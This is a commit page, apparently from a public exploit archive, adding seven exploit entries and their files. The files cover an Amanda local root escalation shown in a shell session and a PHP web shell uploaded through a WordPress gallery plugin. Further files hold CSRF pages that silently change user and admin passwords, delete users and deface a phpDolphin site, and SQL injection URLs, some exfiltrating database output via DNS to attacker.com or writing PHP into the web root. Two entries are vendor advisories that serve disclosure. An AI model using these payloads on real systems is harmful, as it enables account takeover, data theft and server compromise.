DB: 2016-01-16
7 new exploits
This commit is contained in:
parent
0bc9ee328e
commit
5abd225e44
8 changed files with 365 additions and 0 deletions
|
@ -35483,3 +35483,10 @@ id,file,description,date,author,platform,type,port
|
|||
39234,platforms/php/webapps/39234.py,"SevOne NMS <= 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80
|
||||
39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090
|
||||
39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution Vulnerability",2016-01-14,"Bikramaditya Guha",multiple,webapps,0
|
||||
39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery <= 1.9.1 'photocrati_ajax' Arbitrary File Upload Vulnerability",2014-05-19,SANTHO,php,webapps,0
|
||||
39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0
|
||||
39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0
|
||||
39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80
|
||||
39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0
|
||||
39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
|
||||
39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
29
platforms/linux/local/39244.txt
Executable file
29
platforms/linux/local/39244.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
AMANDA, the Advanced Maryland Automatic Network Disk Archiver, is a backup
|
||||
solution that allows the IT administrator to set up a single master backup
|
||||
server to back up multiple hosts over network to tape drives/changers or
|
||||
disks or optical media. Amanda uses native utilities and formats (e.g. dump
|
||||
and/or GNU tar) and can back up a large number of servers and workstations
|
||||
running multiple versions of Linux or Unix.
|
||||
|
||||
A user with backup privs can trivially compromise a client installation.
|
||||
Amstar is an Amanda Application API script. It should not be run by users
|
||||
directly. It uses star to backup and restore data. It runs binaries with
|
||||
root permissions when parsing the command line arguement --star-path.
|
||||
|
||||
Tested against Amanda 3.3.1. An example is shown below:
|
||||
|
||||
$ id
|
||||
uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
|
||||
$ cat /tmp/runme.sh
|
||||
#!/bin/sh
|
||||
/bin/sh
|
||||
$ ls -al /usr/lib/amanda/application/amstar
|
||||
-rwsr-xr-- 1 root backup 31284 Jul 29 2012 /usr/lib/amanda/application/amstar
|
||||
$ /usr/lib/amanda/application/amstar restore --star-path=/tmp/runme.sh
|
||||
# id
|
||||
uid=0(root) gid=34(backup) groups=0(root),6(disk),26(tape),34(backup)
|
||||
# uname -a
|
||||
Linux raspberrypi 3.10.25 #1 Sat Dec 28 20:50:23 EST 2013 armv6l GNU/Linux
|
||||
#
|
||||
|
||||
-- Hacker Fantastic
|
26
platforms/php/webapps/39237.txt
Executable file
26
platforms/php/webapps/39237.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
source: http://www.securityfocus.com/bid/68414/info
|
||||
|
||||
The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
|
||||
|
||||
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
|
||||
|
||||
Versions prior to NextGEN Gallery 2.0.63 are vulnerable.
|
||||
|
||||
cmd.php.jpg
|
||||
-----------------------------2427186578189
|
||||
Content-Disposition: form-data; name="file"; filename="cmd.php"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="GET" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<?
|
||||
if($_GET['cmd']) {
|
||||
system($_GET['cmd']);
|
||||
}
|
||||
?>
|
||||
</pre>
|
||||
</BODY></HTML>
|
7
platforms/php/webapps/39238.txt
Executable file
7
platforms/php/webapps/39238.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/68437/info
|
||||
|
||||
AtomCMS is prone to an SQL-injection vulnerability and an arbitrary file-upload vulnerability.
|
||||
|
||||
Exploiting these issues could allow an attacker to upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/acms/admin/uploads.php?id=1
|
9
platforms/php/webapps/39239.txt
Executable file
9
platforms/php/webapps/39239.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68438/info
|
||||
|
||||
xClassified is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
xClassified 1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/ads.php?catid=4%27a[SQLi]
|
111
platforms/php/webapps/39243.txt
Executable file
111
platforms/php/webapps/39243.txt
Executable file
|
@ -0,0 +1,111 @@
|
|||
# Exploit Title: phpDolphin <= 2.0.5 CSRF
|
||||
# Google Dork: intext:"Powered by phpDolphin"
|
||||
# Date: January, 15th 2016
|
||||
# Exploit Author: WhiteCollarGroup
|
||||
# Vendor Homepage: http://phpdolphin.com
|
||||
# Version: 2.0.5
|
||||
|
||||
XSS (Reflected)
|
||||
===============
|
||||
|
||||
> http://target.com/index.php?a=search&q=teste&filter=m"><h1>XSS</h1><noscript>
|
||||
CSRF
|
||||
====
|
||||
|
||||
We've found no protection against CSRF (Cross-site Request Forgery), which made possible to do any kind of act on a user (or admin) account.
|
||||
|
||||
NO FORMS are secured at all. But we've included some interesting examples. These examples execute actions on the user account while he's visiting a special page prepared by us in any other server. He won't know anything while visiting, as nothing is shown. Let's start from the basic:
|
||||
|
||||
Logging an user off
|
||||
------------------
|
||||
|
||||
```
|
||||
<img src="http://localhost/dolphin/Script/index.php?a=feed&logout=1" width="1" height="1" />
|
||||
```
|
||||
|
||||
It's good to remember that if the user kept the "remember me" on, there are cookies called "username" and (MD5-encoded) "password".
|
||||
|
||||
Posting on user's timeline
|
||||
--------------------------
|
||||
|
||||
By changing the "group" input, it's also possible to post on groups.
|
||||
|
||||
```
|
||||
Lorem ipsum dolor sit amet :)<br/>
|
||||
Take a look on your profile ;)
|
||||
<form method="post" action="http://localhost/dolphin/Script/requests/post_message.php" target="hiddenframe" id="hackfrm">
|
||||
<input type="hidden" name="message" value="HAXORED" />
|
||||
<input type="hidden" name="privacy" value="1" />
|
||||
<input type="hidden" name="group" value="" />
|
||||
<input type="hidden" name="value" value="" />
|
||||
</form>
|
||||
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
|
||||
<script> document.getElementById('hackfrm').submit(); </script>
|
||||
```
|
||||
|
||||
Things can get a bit funnier.
|
||||
|
||||
Changing user password
|
||||
----------------------
|
||||
|
||||
It's interesting that the change password form does NOT require the actual password. Just make sure "password" and "repeat_password" inputs have EXACTLY the same value.
|
||||
|
||||
```
|
||||
<form method="post" action="http://localhost/dolphin/Script/index.php?a=settings&b=security" target="hiddenframe" id="hackfrm">
|
||||
<input type="hidden" name="password" value="hacked1" />
|
||||
<input type="hidden" name="repeat_password" value="hacked1" />
|
||||
</form>
|
||||
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
|
||||
<script> document.getElementById('hackfrm').submit(); </script>
|
||||
```
|
||||
|
||||
Funny enough? Not?
|
||||
|
||||
So let's change the administration password too. Of course this page must be accessed by the administrator.
|
||||
|
||||
```
|
||||
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=security" target="hiddenframe" id="hackfrm">
|
||||
<input type="hidden" name="password" value="hacked1" />
|
||||
<input type="hidden" name="repeat_password" value="hacked1" />
|
||||
</form>
|
||||
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
|
||||
<script> document.getElementById('hackfrm').submit(); </script>
|
||||
```
|
||||
|
||||
In order to open the admin panel, just visit `/index.php?a=admin`.
|
||||
|
||||
Want to delete some user? Just find out the user ID (numeric). For that, just open the user profile, view source (Ctrl + U), find (Ctrl + F) "userid". You will find two attributes "data-userid". That's the numeric user ID.
|
||||
|
||||
```
|
||||
<img src="http://localhost/dolphin/Script/index.php?a=admin&b=users&delete=USER_ID_HERE" width="0" height="0" />
|
||||
```
|
||||
|
||||
Just want to mess everything up?
|
||||
|
||||
Hacking site index
|
||||
==================
|
||||
|
||||
By adding Javascript code to one or more of the advertising units, we can block anyone's access to the site. This is our payload:
|
||||
|
||||
```
|
||||
<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>
|
||||
```
|
||||
|
||||
And this is our code:
|
||||
|
||||
```
|
||||
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=manage_ads&m=i" target="hiddenframe" id="hackfrm">
|
||||
<input type="hidden" name="ad1" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
|
||||
<input type="hidden" name="ad2" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
|
||||
<input type="hidden" name="ad3" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
|
||||
<input type="hidden" name="ad4" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
|
||||
<input type="hidden" name="ad5" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
|
||||
<input type="hidden" name="ad6" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
|
||||
</form>
|
||||
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
|
||||
<script> document.getElementById('hackfrm').submit(); </script>
|
||||
```
|
||||
|
||||
Enough?
|
||||
|
||||
Simply all forms are vulnerable to CSRF. These were just some.
|
77
platforms/php/webapps/39245.txt
Executable file
77
platforms/php/webapps/39245.txt
Executable file
|
@ -0,0 +1,77 @@
|
|||
Advisory ID: HTB23283
|
||||
Product: Roundcube
|
||||
Vendor: Roundcube.net
|
||||
Vulnerable Version(s): 1.1.3 and probably prior
|
||||
Tested Version: 1.1.3
|
||||
Advisory Publication: December 21, 2015 [without technical details]
|
||||
Vendor Notification: December 21, 2015
|
||||
Vendor Patch: December 26, 2015
|
||||
Public Disclosure: January 13, 2016
|
||||
Vulnerability Type: Path Traversal [CWE-22]
|
||||
CVE Reference: CVE-2015-8770
|
||||
Risk Level: Medium
|
||||
CVSSv3 Base Score: 5.3 [CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L]
|
||||
Solution Status: Fixed by Vendor
|
||||
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Advisory Details:
|
||||
|
||||
High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in a popular webmail client Roundcube. Vulnerability can be exploited to gain access to sensitive information and under certain circumstances to execute arbitrary code and totally compromise the vulnerable server.
|
||||
|
||||
The vulnerability exists due to insufficient sanitization of "_skin" HTTP POST parameter in "/index.php" script when changing between different skins of the web application. A remote authenticated attacker can use path traversal sequences (e.g. "../../") to load a new skin from arbitrary location on the system, readable by the webserver.
|
||||
|
||||
A simple exploit below will send HTTP POST request to vulnerable script and will load a new skin from "/tmp" folder:
|
||||
|
||||
|
||||
<form action="http://[HOST]/" method="post" name="main">
|
||||
<input type="hidden" name="_token" value="[TOKEN]">
|
||||
<input type="hidden" name="_framed" value="1">
|
||||
<input type="hidden" name="_task" value="settings">
|
||||
<input type="hidden" name="_action" value="save-prefs">
|
||||
<input type="hidden" name="_section" value="general">
|
||||
<input type="hidden" name="_language" value="en_US">
|
||||
<input type="hidden" name="_timezone" value="auto">
|
||||
<input type="hidden" name="_time_format" value="H:A">
|
||||
<input type="hidden" name="_date_format" value="Y-m-d">
|
||||
<input type="hidden" name="_pretty_date" value="1">
|
||||
<input type="hidden" name="_refresh_interval" value="1">
|
||||
<input type="hidden" name="_skin" value="../../../../../../../../tmp">
|
||||
<input value="submit" id="btn" type="submit" />
|
||||
</form>
|
||||
|
||||
|
||||
Exploitation of the vulnerability requires valid user credentials and ability to create files on vulnerable host.
|
||||
|
||||
Using specially crafted skin for Roundcube, a remote attacker can gain access to potentially sensitive information. The following code in skin files will display database access credentials:
|
||||
|
||||
<roundcube:var name="config:db_dsnw" />
|
||||
|
||||
In case, when "skin_include_php" parameter is set to true, the attacker will be able to execute arbitrary PHP code from the skin files:
|
||||
|
||||
$config['skin_include_php'] = true;
|
||||
|
||||
This vulnerability is difficult to exploit since it requires ability to create files on the web server and a valid Roundcube account. But this situation is very common for shared hosting servers, that host clients' websites on the same server as Roundcube.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Solution:
|
||||
|
||||
Update to Roundcube 1.1.4
|
||||
|
||||
https://roundcube.net/news/2015/12/26/updates-1.1.4-and-1.0.8-released/
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
References:
|
||||
|
||||
[1] High-Tech Bridge Advisory HTB23283 - https://www.htbridge.com/advisory/HTB23283 - RCE in Roundcube
|
||||
[2] Roundcube - https://roundcube.net/ - Free and Open Source Webmail Software
|
||||
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
|
||||
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
|
||||
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|
99
platforms/php/webapps/39246.txt
Executable file
99
platforms/php/webapps/39246.txt
Executable file
|
@ -0,0 +1,99 @@
|
|||
Advisory ID: HTB23279
|
||||
Product: mcart.xls Bitrix module
|
||||
Vendor: www.mcart.ru
|
||||
Vulnerable Version(s): 6.5.2 and probably prior
|
||||
Tested Version: 6.5.2
|
||||
Advisory Publication: November 18, 2015 [without technical details]
|
||||
Vendor Notification: November 18, 2015
|
||||
Public Disclosure: January 13, 2016
|
||||
Vulnerability Type: SQL Injection [CWE-89]
|
||||
CVE Reference: CVE-2015-8356
|
||||
Risk Level: Medium
|
||||
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
|
||||
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Advisory Details:
|
||||
|
||||
High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website.
|
||||
|
||||
All discovered vulnerabilities require that the attacker is authorized against the website and has access to vulnerable module. However the vulnerabilities can be also exploited via CSRF vector, since the web application does not check origin of received requests. This means, that a remote anonymous attacker can create a page with CSRF exploit, trick victim to visit this page and execute arbitrary SQL queries in database of vulnerable website.
|
||||
|
||||
1. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.
|
||||
|
||||
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import.php?del_prof_real=1&xls_profile=%27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))+--+
|
||||
|
||||
2. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.
|
||||
|
||||
A simple exploit below will write "<?phpinfo()?>" string into "/var/www/file.php" file:
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import.php?xls_profile=%27%20UNION%20SELECT%201,%27%3C?%20phpinfo%28%29;%20?%3E%27,3,4,5,6,7,8,9,0%20INTO%20OUTFILE%20%27/var/www/file.php%27%20--%202
|
||||
|
||||
Successful exploitation requires that the file "/var/www/file.php" is writable by MySQL system account.
|
||||
|
||||
3. Input passed via the "xls_iblock_id", "xls_iblock_section_id", "firstRow", "titleRow", "firstColumn", "highestColumn", "sku_iblock_id" and "xls_iblock_section_id_new" HTTP GET parameters to "/bitrix/admin/mcart_xls_import_step_2.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.
|
||||
|
||||
Below is a list of exploits for each vulnerable parameter. The exploits are based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
|
||||
|
||||
"xls_iblock_id":
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0
|
||||
"xls_iblock_section_id"
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0
|
||||
|
||||
"firstRow":
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0,0,0,0,0,0,0,0,0(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0
|
||||
|
||||
"titleRow":
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0
|
||||
|
||||
"firstColumn":
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0%27,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0
|
||||
|
||||
"highestColumn":
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0%27,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0
|
||||
|
||||
"sku_iblock_id":
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&cml2_link_code=1&xls_iblock_section_id_new=0
|
||||
|
||||
"xls_iblock_section_id_new":
|
||||
|
||||
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+
|
||||
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Solution:
|
||||
|
||||
Disclosure timeline:
|
||||
2015-11-18 Vendor notified via email, no reply.
|
||||
2015-12-01 Vendor notified via email, no reply.
|
||||
2015-12-04 Vendor notified via contact form and email, no reply.
|
||||
2015-12-11 Fix Requested via contact form and emails, no reply.
|
||||
2015-12-28 Fix Requested via contact form and emails, no reply.
|
||||
2016-01-11 Fix Requested via contact form and emails, no reply.
|
||||
2016-01-13 Public disclosure.
|
||||
|
||||
Currently we are not aware of any official solution for this vulnerability.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
References:
|
||||
|
||||
[1] High-Tech Bridge Advisory HTB23279 - https://www.htbridge.com/advisory/HTB23279 - Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module
|
||||
[2] mcart.xls - https://marketplace.1c-bitrix.ru/solutions/mcart.xls/ - A Bitrix module for upload and import data from Excel file.
|
||||
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
|
||||
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
|
||||
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|
Loading…
Add table
Reference in a new issue